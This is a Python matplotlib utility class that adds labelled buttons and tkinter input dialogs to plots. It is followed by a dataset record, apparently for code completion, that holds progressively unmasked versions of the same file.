raise ValueError("'button_actions' must be the same length "
"as 'button_labels")
self.num_buttons = len(self.button_labels)
# Make sure all button actions are supported
sstr = self.supported_actions[0]
for it in range(len(self.supported_actions)):
if it > 0:
sstr += ', {0}'.format(self.supported_actions[it])
for it in range(len(self.button_actions)):
e1 = "Action '{0}' not currently".format(self.button_actions[it])
e2 = "supported. \n Currently supported actions are: \n"
if self.button_actions[it] not in self.supported_actions:
raise ValueError(e1 + e2 + sstr)
def create_buttons(self, width=0.2):
"""
Create a set of buttons along the bottom axis of the figure
Need to re-write this to be generic based on used input
(might not be possible as user need to define events)
:param N: int, Number of buttons, default 3
:param width: float, width of the buttons in x, must be less than
1.0/N
:return:
"""
b_N, b_length = self.num_buttons, width
b_sep = (1. / (b_N + 1)) * (1 - b_N * b_length)
for b in range(b_N):
start = (b + 1) * b_sep + b * b_length
r = [start, 0.05, b_length, 0.075]
self.regions.append(r)
# adjust the figure
plt.subplots_adjust(bottom=0.25)
# populate buttons
for b in range(b_N):
axbutton = plt.axes(self.regions[b])
button = Button(axbutton, self.button_labels[b])
button.on_clicked(self.actions[self.button_actions[b]])
self.buttons.append(button)
def next(self, event):
"""
Event for clicking a button with action "NEXT"
Sets self.result to 1
:param event:
:return:
"""
self.result = 1
def previous(self, event):
"""
Event for clicking a button with action "PREVIOUS"
Sets self.result to -1
:param event:
:return:
"""
self.result = -1
def option(self, event):
"""
Event for clicking a button with action "OPTION"
Sets self.result to button_label[i] where i is the position in
button_label and button_action of the button clicked
:param event:
:return:
"""
pos = self.button_region(event)
if pos is not None:
self.result = self.button_labels[pos]
close = self.button_params[pos].get('close', False)
func = self.button_params[pos].get('func', None)
if func is not None:
func()
if close:
plt.close()
def uinput(self, event):
pos = self.button_region(event)
if pos is not None:
props = self.button_params[pos]
title = props.get('title', 'Enter a Value')
startvalue = props.get('comment', 'Message')
name = props.get('name', 'x')
fmt = props.get('fmt', None)
minval = props.get('minval', None)
maxval = props.get('maxval', None)
root = tkinter.Tk()
root.withdraw()
if fmt == int:
value = tksimpledialog.askinteger(title, startvalue,
minvalue=minval,
maxvalue=maxval)
elif fmt == float:
value = tksimpledialog.askfloat(title, startvalue,
minvalue=minval,
maxvalue=maxval)
else:
value = tksimpledialog.askstring(title, startvalue)
self.data[name] = value
root.destroy()
def end(self, event):
"""
Event for clicking the finish button - closes the graph
:param event: event passed to function
:return:
"""
plt.close()
def button_region(self, event):
if len(self.regions) == 0:
return None
# get mouse click location in pixels
x, y = event.x, event.y
# get the current canvas width and height (in pixels)
width = event.canvas.geometry().width()
height = event.canvas.geometry().height()
# loop round each button region
for r, rn in enumerate(self.regions):
# convert region to pixels
rn1 = [rn[0]*width, rn[1]*height,
(rn[0] + rn[2])*width, (rn[1] + rn[3])*height]
# test whether x, y are in region
cond1 = (x > rn1[0]) & (x < rn1[2])
cond2 = (y > rn1[1]) & (y < rn1[3])
if cond1 and cond2:
return r
return None
# =============================================================================
# Start of code
# =============================================================================
# Main code to test the rectangle selector
if __name__ == '__main__':
import numpy as np
# plt.close()
# fig, frame = plt.subplots(ncols=1, nrows=1)
# x = np.random.rand(100)
# y = np.random.rand(100)
# plt.scatter(x, y, color='k', marker='o', s=20)
# odict = dict(close=True)
# a = Add_Buttons(ax=frame,
# button_labels=['A', 'B'],
# button_actions=['OPTION', 'OPTION'],
# button_params=[odict, odict])
# plt.show()
# plt.close()
plt.close()
fig, frame = plt.subplots(ncols=1, nrows=1)
x = np.random.rand(100)
y = np.random.rand(100)
plt.scatter(x, y, color='k', marker='o', s=20)
odict = dict(close=True)
udict = dict(name='x', fmt=int, title='Enter value',
comment='Please enter x in meters.', minval=4, maxval=10)
a = Add_Buttons(ax=frame,
button_labels=['Enter value', 'Close'],
button_actions=['UINPUT', 'OPTION'],
button_params=[udict, odict])
plt.show()
plt.close()
# =============================================================================
# End of code
# =============================================================================
|
normal
|
{
"blob_id": "1576693264a334153c2752ab6b3b4b65daa7c37c",
"index": 8928,
"step-1": "<mask token>\n\n\nclass Add_Buttons(object):\n <mask token>\n\n def validate_inputs(self):\n try:\n self.button_labels = list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError('Button params must be a dictionary')\n if len(self.button_labels) < 1:\n raise ValueError(\n \"'button_labels' Must have at least one button label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\n \"'button_actions' must be the same length as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = 'supported. \\n Currently supported actions are: \\n'\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n <mask token>\n <mask token>\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval, maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue, minvalue\n =minval, maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n <mask token>\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n x, y = event.x, event.y\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n for r, rn in enumerate(self.regions):\n rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width, \n (rn[1] + rn[3]) * height]\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Add_Buttons(object):\n\n def __init__(self, ax=None, **kwargs):\n \"\"\"\n Adds a select rectangle feature to any matplotlib axis, with select,\n clear all, and finish buttons\n\n :param ax: matplotlib axis, the frame to add the selector to\n :param kwargs: kwargs passed to the rectangle selector\n\n Current allowed kwargs are:\n\n button_labels - list of strings\n defines the name of each button to be displayed\n Must be of length 1 or greater\n \n button_actions - list of strings\n defines the action of each button. Must be same\n length as button_labels\n\n currently supported actions are:\n \n \"NEXT\" - sends a return statement to move to\n next plot \n self.result set to 1\n \n \"PREVIOUS\" - sends a return statement to move to\n previous plot\n self.result set to -1\n \n \"CLOSE\" - closes the plot\n \n \"OPTION\" - sends the button_label string\n self.result set to button_label\n \n \"UINPUT\" - asks user for an input\n\n button_params - list of dictionaries (optional)\n if defined must be same length as button_labels\n \n a dictionary for each button\n \n keywords of each dictionary:\n \n \"close\" - when used with \"OPTION\" action will\n close the plot after OPTION is clicked\n\n \"\"\"\n self.actions = dict(NEXT=self.next, PREVIOUS=self.previous, CLOSE=\n self.end, OPTION=self.option, UINPUT=self.uinput)\n self.supported_actions = list(self.actions.keys())\n self.buttons = []\n self.regions = []\n self.result = 0\n self.data = dict()\n if ax is None:\n self.ax = plt.gca()\n else:\n self.ax = ax\n if kwargs is None:\n kwargs = dict()\n self.button_labels = kwargs.get('button_labels', ['Close'])\n self.num_buttons = len(self.button_labels)\n self.button_actions = kwargs.get('button_actions', ['CLOSE'])\n dparams = [dict()] * self.num_buttons\n self.button_params = kwargs.get('button_params', dparams)\n self.validate_inputs()\n self.create_buttons()\n\n def validate_inputs(self):\n try:\n self.button_labels = list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError('Button params must be a dictionary')\n if len(self.button_labels) < 1:\n raise ValueError(\n \"'button_labels' Must have at least one button label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\n \"'button_actions' must be the same length as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = 'supported. \\n Currently supported actions are: \\n'\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n <mask token>\n <mask token>\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval, maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue, minvalue\n =minval, maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n\n def end(self, event):\n \"\"\"\n Event for clicking the finish button - closes the graph\n\n :param event: event passed to function\n :return:\n \"\"\"\n plt.close()\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n x, y = event.x, event.y\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n for r, rn in enumerate(self.regions):\n rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width, \n (rn[1] + rn[3]) * height]\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Add_Buttons(object):\n\n def __init__(self, ax=None, **kwargs):\n \"\"\"\n Adds a select rectangle feature to any matplotlib axis, with select,\n clear all, and finish buttons\n\n :param ax: matplotlib axis, the frame to add the selector to\n :param kwargs: kwargs passed to the rectangle selector\n\n Current allowed kwargs are:\n\n button_labels - list of strings\n defines the name of each button to be displayed\n Must be of length 1 or greater\n \n button_actions - list of strings\n defines the action of each button. Must be same\n length as button_labels\n\n currently supported actions are:\n \n \"NEXT\" - sends a return statement to move to\n next plot \n self.result set to 1\n \n \"PREVIOUS\" - sends a return statement to move to\n previous plot\n self.result set to -1\n \n \"CLOSE\" - closes the plot\n \n \"OPTION\" - sends the button_label string\n self.result set to button_label\n \n \"UINPUT\" - asks user for an input\n\n button_params - list of dictionaries (optional)\n if defined must be same length as button_labels\n \n a dictionary for each button\n \n keywords of each dictionary:\n \n \"close\" - when used with \"OPTION\" action will\n close the plot after OPTION is clicked\n\n \"\"\"\n self.actions = dict(NEXT=self.next, PREVIOUS=self.previous, CLOSE=\n self.end, OPTION=self.option, UINPUT=self.uinput)\n self.supported_actions = list(self.actions.keys())\n self.buttons = []\n self.regions = []\n self.result = 0\n self.data = dict()\n if ax is None:\n self.ax = plt.gca()\n else:\n self.ax = ax\n if kwargs is None:\n kwargs = dict()\n self.button_labels = kwargs.get('button_labels', ['Close'])\n self.num_buttons = len(self.button_labels)\n self.button_actions = kwargs.get('button_actions', ['CLOSE'])\n dparams = [dict()] * self.num_buttons\n self.button_params = kwargs.get('button_params', dparams)\n self.validate_inputs()\n self.create_buttons()\n\n def validate_inputs(self):\n try:\n self.button_labels = list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError('Button params must be a dictionary')\n if len(self.button_labels) < 1:\n raise ValueError(\n \"'button_labels' Must have at least one button label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\n \"'button_actions' must be the same length as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = 'supported. \\n Currently supported actions are: \\n'\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n\n def create_buttons(self, width=0.2):\n \"\"\"\n Create a set of buttons along the bottom axis of the figure\n\n Need to re-write this to be generic based on used input\n (might not be possible as user need to define events)\n\n :param N: int, Number of buttons, default 3\n :param width: float, width of the buttons in x, must be less than\n 1.0/N\n :return:\n \"\"\"\n b_N, b_length = self.num_buttons, width\n b_sep = 1.0 / (b_N + 1) * (1 - b_N * b_length)\n for b in range(b_N):\n start = (b + 1) * b_sep + b * b_length\n r = [start, 0.05, b_length, 0.075]\n self.regions.append(r)\n plt.subplots_adjust(bottom=0.25)\n for b in range(b_N):\n axbutton = plt.axes(self.regions[b])\n button = Button(axbutton, self.button_labels[b])\n button.on_clicked(self.actions[self.button_actions[b]])\n self.buttons.append(button)\n <mask token>\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval, maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue, minvalue\n =minval, maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n\n def end(self, event):\n \"\"\"\n Event for clicking the finish button - closes the graph\n\n :param event: event passed to function\n :return:\n \"\"\"\n plt.close()\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n x, y = event.x, event.y\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n for r, rn in enumerate(self.regions):\n rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width, \n (rn[1] + rn[3]) * height]\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Add_Buttons(object):\n\n def __init__(self, ax=None, **kwargs):\n \"\"\"\n Adds a select rectangle feature to any matplotlib axis, with select,\n clear all, and finish buttons\n\n :param ax: matplotlib axis, the frame to add the selector to\n :param kwargs: kwargs passed to the rectangle selector\n\n Current allowed kwargs are:\n\n button_labels - list of strings\n defines the name of each button to be displayed\n Must be of length 1 or greater\n \n button_actions - list of strings\n defines the action of each button. Must be same\n length as button_labels\n\n currently supported actions are:\n \n \"NEXT\" - sends a return statement to move to\n next plot \n self.result set to 1\n \n \"PREVIOUS\" - sends a return statement to move to\n previous plot\n self.result set to -1\n \n \"CLOSE\" - closes the plot\n \n \"OPTION\" - sends the button_label string\n self.result set to button_label\n \n \"UINPUT\" - asks user for an input\n\n button_params - list of dictionaries (optional)\n if defined must be same length as button_labels\n \n a dictionary for each button\n \n keywords of each dictionary:\n \n \"close\" - when used with \"OPTION\" action will\n close the plot after OPTION is clicked\n\n \"\"\"\n self.actions = dict(NEXT=self.next, PREVIOUS=self.previous, CLOSE=\n self.end, OPTION=self.option, UINPUT=self.uinput)\n self.supported_actions = list(self.actions.keys())\n self.buttons = []\n self.regions = []\n self.result = 0\n self.data = dict()\n if ax is None:\n self.ax = plt.gca()\n else:\n self.ax = ax\n if kwargs is None:\n kwargs = dict()\n self.button_labels = kwargs.get('button_labels', ['Close'])\n self.num_buttons = len(self.button_labels)\n self.button_actions = kwargs.get('button_actions', ['CLOSE'])\n dparams = [dict()] * self.num_buttons\n self.button_params = kwargs.get('button_params', dparams)\n self.validate_inputs()\n self.create_buttons()\n\n def validate_inputs(self):\n try:\n self.button_labels = list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError('Button params must be a dictionary')\n if len(self.button_labels) < 1:\n raise ValueError(\n \"'button_labels' Must have at least one button label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\n \"'button_actions' must be the same length as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = 'supported. \\n Currently supported actions are: \\n'\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n\n def create_buttons(self, width=0.2):\n \"\"\"\n Create a set of buttons along the bottom axis of the figure\n\n Need to re-write this to be generic based on used input\n (might not be possible as user need to define events)\n\n :param N: int, Number of buttons, default 3\n :param width: float, width of the buttons in x, must be less than\n 1.0/N\n :return:\n \"\"\"\n b_N, b_length = self.num_buttons, width\n b_sep = 1.0 / (b_N + 1) * (1 - b_N * b_length)\n for b in range(b_N):\n start = (b + 1) * b_sep + b * b_length\n r = [start, 0.05, b_length, 0.075]\n self.regions.append(r)\n plt.subplots_adjust(bottom=0.25)\n for b in range(b_N):\n axbutton = plt.axes(self.regions[b])\n button = Button(axbutton, self.button_labels[b])\n button.on_clicked(self.actions[self.button_actions[b]])\n self.buttons.append(button)\n\n def next(self, event):\n \"\"\"\n Event for clicking a button with action \"NEXT\"\n \n Sets self.result to 1\n \n :param event: \n :return: \n \"\"\"\n self.result = 1\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval, maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue, minvalue\n =minval, maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n\n def end(self, event):\n \"\"\"\n Event for clicking the finish button - closes the graph\n\n :param event: event passed to function\n :return:\n \"\"\"\n plt.close()\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n x, y = event.x, event.y\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n for r, rn in enumerate(self.regions):\n rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width, \n (rn[1] + rn[3]) * height]\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 17/02/17 at 11:48 PM\n\n@author: neil\n\nProgram description here\n\nVersion 0.0.1\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Button\nimport sys\n# detect python version\n# if python 3 do this:\nif (sys.version_info > (3, 0)):\n import tkinter\n import tkinter.simpledialog as tksimpledialog\nelse:\n import Tkinter as tkinter\n import tkSimpleDialog as tksimpledialog\n\n# =============================================================================\n# Define Class. Methods and Functions\n# =============================================================================\nclass Add_Buttons(object):\n def __init__(self, ax=None, **kwargs):\n \"\"\"\n Adds a select rectangle feature to any matplotlib axis, with select,\n clear all, and finish buttons\n\n :param ax: matplotlib axis, the frame to add the selector to\n :param kwargs: kwargs passed to the rectangle selector\n\n Current allowed kwargs are:\n\n button_labels - list of strings\n defines the name of each button to be displayed\n Must be of length 1 or greater\n \n button_actions - list of strings\n defines the action of each button. Must be same\n length as button_labels\n\n currently supported actions are:\n \n \"NEXT\" - sends a return statement to move to\n next plot \n self.result set to 1\n \n \"PREVIOUS\" - sends a return statement to move to\n previous plot\n self.result set to -1\n \n \"CLOSE\" - closes the plot\n \n \"OPTION\" - sends the button_label string\n self.result set to button_label\n \n \"UINPUT\" - asks user for an input\n\n button_params - list of dictionaries (optional)\n if defined must be same length as button_labels\n \n a dictionary for each button\n \n keywords of each dictionary:\n \n \"close\" - when used with \"OPTION\" action will\n close the plot after OPTION is clicked\n\n \"\"\"\n # set supported actions (and link to function)\n self.actions = dict(NEXT=self.next,\n PREVIOUS=self.previous,\n CLOSE=self.end,\n OPTION=self.option,\n UINPUT=self.uinput)\n self.supported_actions = list(self.actions.keys())\n # current button params\n self.buttons = []\n self.regions = []\n # result (1, 0, -1, or string)\n self.result = 0\n # storage\n self.data = dict()\n # Deal with having no matplotlib axis\n if ax is None:\n self.ax = plt.gca()\n else:\n self.ax = ax\n # load keyword arguments\n if kwargs is None:\n kwargs = dict()\n self.button_labels = kwargs.get('button_labels', ['Close'])\n self.num_buttons = len(self.button_labels)\n self.button_actions = kwargs.get('button_actions', ['CLOSE'])\n dparams = [dict()]*self.num_buttons\n self.button_params = kwargs.get('button_params', dparams)\n # check inputs are correct\n self.validate_inputs()\n # create buttons\n self.create_buttons()\n\n def validate_inputs(self):\n # Make sure button labels is in correct format\n try:\n self.button_labels = list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError(\"Button labels must be a list of strings\")\n # Make sure button actions is in correct format\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError(\"Button labels must be a list of strings\")\n # Make sure button actions is in correct format\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError(\"Button params must be a dictionary\")\n # Make sure list are not empty and same length\n if len(self.button_labels) < 1:\n raise ValueError(\"'button_labels' Must have at least one button \"\n \"label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\"'button_actions' must be the same length \"\n \"as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n # Make sure all button actions are supported\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = \"supported. \\n Currently supported actions are: \\n\"\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n\n def create_buttons(self, width=0.2):\n \"\"\"\n Create a set of buttons along the bottom axis of the figure\n\n Need to re-write this to be generic based on used input\n (might not be possible as user need to define events)\n\n :param N: int, Number of buttons, default 3\n :param width: float, width of the buttons in x, must be less than\n 1.0/N\n :return:\n \"\"\"\n b_N, b_length = self.num_buttons, width\n b_sep = (1. / (b_N + 1)) * (1 - b_N * b_length)\n for b in range(b_N):\n start = (b + 1) * b_sep + b * b_length\n r = [start, 0.05, b_length, 0.075]\n self.regions.append(r)\n\n # adjust the figure\n plt.subplots_adjust(bottom=0.25)\n # populate buttons\n for b in range(b_N):\n axbutton = plt.axes(self.regions[b])\n button = Button(axbutton, self.button_labels[b])\n button.on_clicked(self.actions[self.button_actions[b]])\n self.buttons.append(button)\n\n def next(self, event):\n \"\"\"\n Event for clicking a button with action \"NEXT\"\n \n Sets self.result to 1\n \n :param event: \n :return: \n \"\"\"\n self.result = 1\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval,\n maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue,\n minvalue=minval,\n maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n\n\n def end(self, event):\n \"\"\"\n Event for clicking the finish button - closes the graph\n\n :param event: event passed to function\n :return:\n \"\"\"\n plt.close()\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n # get mouse click location in pixels\n x, y = event.x, event.y\n # get the current canvas width and height (in pixels)\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n # loop round each button region\n for r, rn in enumerate(self.regions):\n # convert region to pixels\n rn1 = [rn[0]*width, rn[1]*height,\n (rn[0] + rn[2])*width, (rn[1] + rn[3])*height]\n # test whether x, y are in region\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n# =============================================================================\n# Start of code\n# =============================================================================\n# Main code to test the rectangle selector\nif __name__ == '__main__':\n import numpy as np\n # plt.close()\n # fig, frame = plt.subplots(ncols=1, nrows=1)\n # x = np.random.rand(100)\n # y = np.random.rand(100)\n # plt.scatter(x, y, color='k', marker='o', s=20)\n # odict = dict(close=True)\n # a = Add_Buttons(ax=frame,\n # button_labels=['A', 'B'],\n # button_actions=['OPTION', 'OPTION'],\n # button_params=[odict, odict])\n # plt.show()\n # plt.close()\n\n plt.close()\n fig, frame = plt.subplots(ncols=1, nrows=1)\n x = np.random.rand(100)\n y = np.random.rand(100)\n plt.scatter(x, y, color='k', marker='o', s=20)\n odict = dict(close=True)\n udict = dict(name='x', fmt=int, title='Enter value',\n comment='Please enter x in meters.', minval=4, maxval=10)\n a = Add_Buttons(ax=frame,\n button_labels=['Enter value', 'Close'],\n button_actions=['UINPUT', 'OPTION'],\n button_params=[udict, odict])\n plt.show()\n plt.close()\n\n# =============================================================================\n# End of code\n# =============================================================================\n",
"step-ids": [
6,
8,
9,
10,
13
